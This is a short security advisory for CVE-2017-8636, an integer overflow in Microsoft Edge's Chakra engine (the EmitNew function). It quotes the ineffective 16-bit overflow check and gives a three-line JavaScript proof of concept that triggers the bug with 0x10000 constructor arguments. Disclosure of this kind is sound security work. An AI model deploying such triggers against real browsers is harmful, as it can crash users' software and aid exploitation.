Microsoft Edge Chakra EmitNew Integer Overflow

Microsoft Edge Chakra suffers from an integer overflow vulnerability in EmitNew.


MD5 | 8345cf786d59f19382f074d30d3d7a64

 Microsoft Edge: Chakra: Integer overflow in EmitNew 

CVE-2017-8636


The bytecode generator uses the "EmitNew" function to handle new operators.
Here's the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include "this"

BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);

if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}

"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.

PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


Related Posts

Comments